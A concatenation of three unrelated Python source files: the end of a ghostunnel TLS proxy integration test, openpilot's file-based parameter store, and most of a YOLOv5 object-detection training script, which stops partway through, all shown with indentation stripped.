time.sleep(r)
continue
counter+=1
if r < 0.7:
p.validate_can_send_from_client("blah blah blah", "{0}:{1} client -> server".format(i, counter))
else:
p.validate_can_send_from_server("blah blah blah", "{0}:{1} server -> client".format(i, counter))
r = random.random()
if r < 0.5:
p.validate_closing_client_closes_server("{0} client close -> server close".format(i))
else:
p.validate_closing_server_closes_client("{0} server close -> client close".format(i))
if __name__ == "__main__":
ghostunnel = None
n_clients = 10
try:
# create certs
root = RootCert('root')
root.create_signed_cert('client')
for i in range(1, n_clients):
root.create_signed_cert("server{0}".format(i))
# start ghostunnel
ghostunnel = run_ghostunnel(['client', '--listen={0}:13001'.format(LOCALHOST),
'--target={0}:13002'.format(LOCALHOST), '--keystore=client.p12',
'--status={0}:{1}'.format(LOCALHOST, STATUS_PORT),
'--cacert=root.crt'])
# servers should be able to communicate all at the same time.
proc = []
for i in range(1, n_clients):
pair = SocketPair(TcpClient(13001), TlsServer("server{0}".format(i), 'root', 13002))
p = Process(target=send_data, args=(i,pair,))
p.start()
proc.append(p)
for p in proc:
p.join()
print_ok("OK")
finally:
terminate(ghostunnel)
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CachedFingerprint": [TxType.CLEAR_ON_PANDA_DISCONNECT],
"CalibrationParams": [TxType.PERSISTENT],
"CarBatteryCapacity": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DisablePowerDownTime": [TxType.PERSISTENT],
"DisableUpdates": [TxType.PERSISTENT],
"DistanceTraveled": [TxType.PERSISTENT],
"DistanceTraveledEngaged": [TxType.PERSISTENT],
"DistanceTraveledOverride": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HandsOnWheelMonitoring": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LastUpdateException": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"VisionRadarToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_NeosUpdate": [TxType.CLEAR_ON_MANAGER_START],
"DevBBUI": [TxType.PERSISTENT],
"Offroad_UpdateFailed": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create, lock_ex):
self._path = path
self._create = create
self._fd = None
self._lock_ex = lock_ex
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX if self._lock_ex else fcntl.LOCK_SH)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create, lock_ex):
lock = FileLock(os.path.join(self._path, ".lock"), create, lock_ex)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False, False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True, True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True, True)
lock.acquire()
try:
tmp_path = tempfile.NamedTemporaryFile(mode="wb", prefix=".tmp", dir=params_path, delete=False)
with tmp_path as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
os.chmod(tmp_path.name, 0o666)
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path.name, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
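# Minimal usage sketch (illustrative only; "/tmp/params_example" is a throwaway directory
# for this example, not the real PARAMS path):
if __name__ == "__main__":
  example = Params(db="/tmp/params_example")
  example.put("DongleId", "0000000000000000")      # blocks until the value is fsync'd
  print(example.get("DongleId", encoding='utf8'))  # -> "0000000000000000"
  example.delete("DongleId")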
|
train.py
|
import argparse
import logging
import math
import os
import random
import time
from copy import deepcopy
from pathlib import Path
from threading import Thread
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import test # import test.py to get mAP after each epoch
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import labels_to_class_weights, increment_path, labels_to_image_weights, init_seeds, \
fitness, strip_optimizer, get_latest_run, check_dataset, check_file, check_git_status, check_img_size, \
check_requirements, print_mutation, set_logging, one_cycle, colorstr
from utils.google_utils import attempt_download
from utils.loss import ComputeLoss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import ModelEMA, select_device, intersect_dicts, torch_distributed_zero_first, is_parallel
from utils.wandb_logging.wandb_utils import WandbLogger, check_wandb_resume
logger = logging.getLogger(__name__)
def train(hyp, opt, device, tb_writer=None):
logger.info(colorstr('hyperparameters: ') + ', '.join(f'{k}={v}' for k, v in hyp.items()))
save_dir, epochs, batch_size, total_batch_size, weights, rank = \
Path(opt.save_dir), opt.epochs, opt.batch_size, opt.total_batch_size, opt.weights, opt.global_rank
# Directories
wdir = save_dir / 'weights'
wdir.mkdir(parents=True, exist_ok=True) # make dir
last = wdir / 'last.pt'
best = wdir / 'best.pt'
results_file = save_dir / 'results.txt'
# Save run settings
with open(save_dir / 'hyp.yaml', 'w') as f:
yaml.dump(hyp, f, sort_keys=False)
with open(save_dir / 'opt.yaml', 'w') as f:
yaml.dump(vars(opt), f, sort_keys=False)
# Configure
plots = not opt.evolve # create plots
cuda = device.type != 'cpu'
init_seeds(2 + rank)
with open(opt.data) as f:
data_dict = yaml.load(f, Loader=yaml.SafeLoader) # data dict
is_coco = opt.data.endswith('coco.yaml')
# Logging- Doing this before checking the dataset. Might update data_dict
loggers = {'wandb': None} # loggers dict
if rank in [-1, 0]:
opt.hyp = hyp # add hyperparameters
run_id = torch.load(weights).get('wandb_id') if weights.endswith('.pt') and os.path.isfile(weights) else None
wandb_logger = WandbLogger(opt, Path(opt.save_dir).stem, run_id, data_dict)
loggers['wandb'] = wandb_logger.wandb
data_dict = wandb_logger.data_dict
if wandb_logger.wandb:
weights, epochs, hyp = opt.weights, opt.epochs, opt.hyp # WandbLogger might update weights, epochs if resuming
nc = 1 if opt.single_cls else int(data_dict['nc']) # number of classes
names = ['item'] if opt.single_cls and len(data_dict['names']) != 1 else data_dict['names'] # class names
assert len(names) == nc, '%g names found for nc=%g dataset in %s' % (len(names), nc, opt.data) # check
# Model
pretrained = weights.endswith('.pt')
if pretrained:
with torch_distributed_zero_first(rank):
attempt_download(weights) # download if not found locally
ckpt = torch.load(weights, map_location=device) # load checkpoint
model = Model(opt.cfg or ckpt['model'].yaml, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
exclude = ['anchor'] if (opt.cfg or hyp.get('anchors')) and not opt.resume else [] # exclude keys
state_dict = ckpt['model'].float().state_dict() # to FP32
state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude) # intersect
model.load_state_dict(state_dict, strict=False) # load
logger.info('Transferred %g/%g items from %s' % (len(state_dict), len(model.state_dict()), weights)) # report
else:
model = Model(opt.cfg, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
with torch_distributed_zero_first(rank):
check_dataset(data_dict) # check
train_path = data_dict['train']
test_path = data_dict['val']
# Freeze
freeze = [] # parameter names to freeze (full or partial)
for k, v in model.named_parameters():
v.requires_grad = True # train all layers
if any(x in k for x in freeze):
print('freezing %s' % k)
v.requires_grad = False
# Optimizer
nbs = 64 # nominal batch size
accumulate = max(round(nbs / total_batch_size), 1) # accumulate loss before optimizing
hyp['weight_decay'] *= total_batch_size * accumulate / nbs # scale weight_decay
logger.info(f"Scaled weight_decay = {hyp['weight_decay']}")
pg0, pg1, pg2 = [], [], [] # optimizer parameter groups
for k, v in model.named_modules():
if hasattr(v, 'bias') and isinstance(v.bias, nn.Parameter):
pg2.append(v.bias) # biases
if isinstance(v, nn.BatchNorm2d):
pg0.append(v.weight) # no decay
elif hasattr(v, 'weight') and isinstance(v.weight, nn.Parameter):
pg1.append(v.weight) # apply decay
if opt.adam:
optimizer = optim.Adam(pg0, lr=hyp['lr0'], betas=(hyp['momentum'], 0.999)) # adjust beta1 to momentum
else:
optimizer = optim.SGD(pg0, lr=hyp['lr0'], momentum=hyp['momentum'], nesterov=True)
optimizer.add_param_group({'params': pg1, 'weight_decay': hyp['weight_decay']}) # add pg1 with weight_decay
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
logger.info('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
# https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
if opt.linear_lr:
lf = lambda x: (1 - x / (epochs - 1)) * (1.0 - hyp['lrf']) + hyp['lrf'] # linear
else:
lf = one_cycle(1, hyp['lrf'], epochs) # cosine 1->hyp['lrf']
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
# plot_lr_scheduler(optimizer, scheduler, epochs)
# EMA
ema = ModelEMA(model) if rank in [-1, 0] else None
# Resume
start_epoch, best_fitness = 0, 0.0
if pretrained:
# Optimizer
if ckpt['optimizer'] is not None:
optimizer.load_state_dict(ckpt['optimizer'])
best_fitness = ckpt['best_fitness']
# EMA
if ema and ckpt.get('ema'):
ema.ema.load_state_dict(ckpt['ema'].float().state_dict())
ema.updates = ckpt['updates']
# Results
if ckpt.get('training_results') is not None:
results_file.write_text(ckpt['training_results']) # write results.txt
# Epochs
start_epoch = ckpt['epoch'] + 1
if opt.resume:
assert start_epoch > 0, '%s training to %g epochs is finished, nothing to resume.' % (weights, epochs)
if epochs < start_epoch:
logger.info('%s has been trained for %g epochs. Fine-tuning for %g additional epochs.' %
(weights, ckpt['epoch'], epochs))
epochs += ckpt['epoch'] # finetune additional epochs
del ckpt, state_dict
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size] # verify imgsz are gs-multiples
# DP mode
if cuda and rank == -1 and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
# SyncBatchNorm
if opt.sync_bn and cuda and rank != -1:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
logger.info('Using SyncBatchNorm()')
# Trainloader
dataloader, dataset = create_dataloader(train_path, imgsz, batch_size, gs, opt,
hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=rank,
world_size=opt.world_size, workers=opt.workers,
image_weights=opt.image_weights, quad=opt.quad, prefix=colorstr('train: '))
mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class
nb = len(dataloader) # number of batches
assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, opt.data, nc - 1)
# Process 0
if rank in [-1, 0]:
testloader = create_dataloader(test_path, imgsz_test, batch_size * 2, gs, opt, # testloader
hyp=hyp, cache=opt.cache_images and not opt.notest, rect=True, rank=-1,
world_size=opt.world_size, workers=opt.workers,
pad=0.5, prefix=colorstr('val: '))[0]
if not opt.resume:
labels = np.concatenate(dataset.labels, 0)
c = torch.tensor(labels[:, 0]) # classes
# cf = torch.bincount(c.long(), minlength=nc) + 1. # frequency
# model._initialize_biases(cf.to(device))
if plots:
plot_labels(labels, names, save_dir, loggers)
if tb_writer:
tb_writer.add_histogram('classes', c, 0)
# Anchors
if not opt.noautoanchor:
check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz)
model.half().float() # pre-reduce anchor precision
# DDP mode
if cuda and rank != -1:
model = DDP(model, device_ids=[opt.local_rank], output_device=opt.local_rank,
# nn.MultiheadAttention incompatibility with DDP https://github.com/pytorch/pytorch/issues/26698
find_unused_parameters=any(isinstance(layer, nn.MultiheadAttention) for layer in model.modules()))
# Model parameters
hyp['box'] *= 3. / nl # scale to layers
hyp['cls'] *= nc / 80. * 3. / nl # scale to classes and layers
hyp['obj'] *= (imgsz / 640) ** 2 * 3. / nl # scale to image size and layers
hyp['label_smoothing'] = opt.label_smoothing
model.nc = nc # attach number of classes to model
model.hyp = hyp # attach hyperparameters to model
model.gr = 1.0 # iou loss ratio (obj_loss = 1.0 or iou)
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc # attach class weights
model.names = names
# Start training
t0 = time.time()
nw = max(round(hyp['warmup_epochs'] * nb), 1000) # number of warmup iterations, max(3 epochs, 1k iterations)
# nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0, 0, 0) # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
scheduler.last_epoch = start_epoch - 1 # do not move
scaler = amp.GradScaler(enabled=cuda)
compute_loss = ComputeLoss(model) # init loss class
logger.info(f'Image sizes {imgsz} train, {imgsz_test} test\n'
f'Using {dataloader.num_workers} dataloader workers\n'
f'Logging results to {save_dir}\n'
f'Starting training for {epochs} epochs...')
for epoch in range(start_epoch, epochs): # epoch ------------------------------------------------------------------
model.train()
# Update image weights (optional)
if opt.image_weights:
# Generate indices
if rank in [-1, 0]:
cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc # class weights
iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw) # image weights
dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n) # rand weighted idx
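# Classes with low per-class mAP get larger weights via (1 - maps) ** 2, so
# images containing them are sampled more often in the next epoch.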
# Broadcast if DDP
if rank != -1:
indices = (torch.tensor(dataset.indices) if rank == 0 else torch.zeros(dataset.n)).int()
dist.broadcast(indices, 0)
if rank != 0:
dataset.indices = indices.cpu().numpy()
# Update mosaic border
# b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
# dataset.mosaic_border = [b - imgsz, -b] # height, width borders
mloss = torch.zeros(4, device=device) # mean losses
if rank != -1:
dataloader.sampler.set_epoch(epoch)
pbar = enumerate(dataloader)
logger.info(('\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'labels', 'img_size'))
if rank in [-1, 0]:
pbar = tqdm(pbar, total=nb) # progress bar
optimizer.zero_grad()
for i, (imgs, targets, paths, _) in pbar: # batch -------------------------------------------------------------
ni = i + nb * epoch # number integrated batches (since train start)
imgs = imgs.to(device, non_blocking=True).float() / 255.0 # uint8 to float32, 0-255 to 0.0-1.0
# Warmup
if ni <= nw:
xi = [0, nw] # x interp
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
accumulate = max(1, np.interp(ni, xi, [1, nbs / total_batch_size]).round())
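# 'accumulate' ramps from 1 up to nbs / total_batch_size during warmup, so
# gradients are accumulated over several batches and the effective batch size
# approaches nbs (the nominal batch size set earlier in the script); e.g.
# total_batch_size=16 and nbs=64 would ramp accumulate from 1 to 4.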
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']])
# Multi-scale
if opt.multi_scale:
sz = random.randrange(int(imgsz * 0.5), int(imgsz * 1.5 + gs)) // gs * gs # size (randrange needs integer bounds)
sf = sz / max(imgs.shape[2:]) # scale factor
if sf != 1:
ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]] # new shape (stretched to gs-multiple)
imgs = F.interpolate(imgs, size=ns, mode='bilinear', align_corners=False)
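# e.g. imgsz=640 and gs=32 samples sz from roughly 320-960 in 32-pixel steps,
# then the whole batch is resized (stretched to a gs-multiple) so its longest
# side matches the sampled size.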
# Forward
with amp.autocast(enabled=cuda):
pred = model(imgs) # forward
loss, loss_items = compute_loss(pred, targets.to(device)) # loss scaled by batch_size
if rank != -1:
loss *= opt.world_size # gradient averaged between devices in DDP mode
if opt.quad:
loss *= 4.
# Backward
scaler.scale(loss).backward()
# Optimize
if ni % accumulate == 0:
scaler.step(optimizer) # optimizer.step
scaler.update()
optimizer.zero_grad()
if ema:
ema.update(model)
# Print
if rank in [-1, 0]:
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
mem = '%.3gG' % (torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0) # (GB)
s = ('%10s' * 2 + '%10.4g' * 6) % (
'%g/%g' % (epoch, epochs - 1), mem, *mloss, targets.shape[0], imgs.shape[-1])
pbar.set_description(s)
# Plot
if plots and ni < 3:
f = save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
# if tb_writer:
# tb_writer.add_image(f, result, dataformats='HWC', global_step=epoch)
# tb_writer.add_graph(model, imgs) # add model to tensorboard
elif plots and ni == 10 and wandb_logger.wandb:
wandb_logger.log({"Mosaics": [wandb_logger.wandb.Image(str(x), caption=x.name) for x in
save_dir.glob('train*.jpg') if x.exists()]})
# end batch ------------------------------------------------------------------------------------------------
# end epoch ----------------------------------------------------------------------------------------------------
# Scheduler
lr = [x['lr'] for x in optimizer.param_groups] # for tensorboard
scheduler.step()
# DDP process 0 or single-GPU
if rank in [-1, 0]:
# mAP
ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'gr', 'names', 'stride', 'class_weights'])
final_epoch = epoch + 1 == epochs
if not opt.notest or final_epoch: # Calculate mAP
wandb_logger.current_epoch = epoch + 1
results, maps, times = test.test(data_dict,
batch_size=batch_size * 2,
imgsz=imgsz_test,
model=ema.ema,
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
verbose=nc < 50 and final_epoch,
plots=plots and final_epoch,
wandb_logger=wandb_logger,
compute_loss=compute_loss,
is_coco=is_coco)
# Write
with open(results_file, 'a') as f:
f.write(s + '%10.4g' * 7 % results + '\n') # append metrics, val_loss
if len(opt.name) and opt.bucket:
os.system('gsutil cp %s gs://%s/results/results%s.txt' % (results_file, opt.bucket, opt.name))
# Log
tags = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
if tb_writer:
tb_writer.add_scalar(tag, x, epoch) # tensorboard
if wandb_logger.wandb:
wandb_logger.log({tag: x}) # W&B
# Update best mAP
fi = fitness(np.array(results).reshape(1, -1)) # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
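# fitness() reduces the [P, R, mAP@.5, mAP@.5:.95] row to a single scalar via a
# weighted sum (in the upstream utils the mAP@.5:.95 term carries most of the
# weight), so best.pt tracks the checkpoint with the best combined score.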
if fi > best_fitness:
best_fitness = fi
wandb_logger.end_epoch(best_result=best_fitness == fi)
# Save model
if (not opt.nosave) or (final_epoch and not opt.evolve): # if save
ckpt = {'epoch': epoch,
'best_fitness': best_fitness,
'training_results': results_file.read_text(),
'model': deepcopy(model.module if is_parallel(model) else model).half(),
'ema': deepcopy(ema.ema).half(),
'updates': ema.updates,
'optimizer': optimizer.state_dict(),
'wandb_id': wandb_logger.wandb_run.id if wandb_logger.wandb else None}
# Save last, best and delete
torch.save(ckpt, last)
if best_fitness == fi:
torch.save(ckpt, best)
if wandb_logger.wandb:
if ((epoch + 1) % opt.save_period == 0 and not final_epoch) and opt.save_period != -1:
wandb_logger.log_model(
last.parent, opt, epoch, fi, best_model=best_fitness == fi)
del ckpt
# end epoch ----------------------------------------------------------------------------------------------------
# end training
if rank in [-1, 0]:
# Plots
if plots:
plot_results(save_dir=save_dir) # save as results.png
if wandb_logger.wandb:
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
wandb_logger.log({"Results": [wandb_logger.wandb.Image(str(save_dir / f), caption=f) for f in files
if (save_dir / f).exists()]})
# Test best.pt
logger.info('%g epochs completed in %.3f hours.\n' % (epoch - start_epoch + 1, (time.time() - t0) / 3600))
if opt.data.endswith('coco.yaml') and nc == 80: # if COCO
for m in (last, best) if best.exists() else (last,): # speed, mAP tests
results, _, _ = test.test(opt.data,
batch_size=batch_size * 2,
imgsz=imgsz_test,
conf_thres=0.001,
iou_thres=0.7,
model=attempt_load(m, device).half(),
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
save_json=True,
plots=False,
is_coco=is_coco)
# Strip optimizers
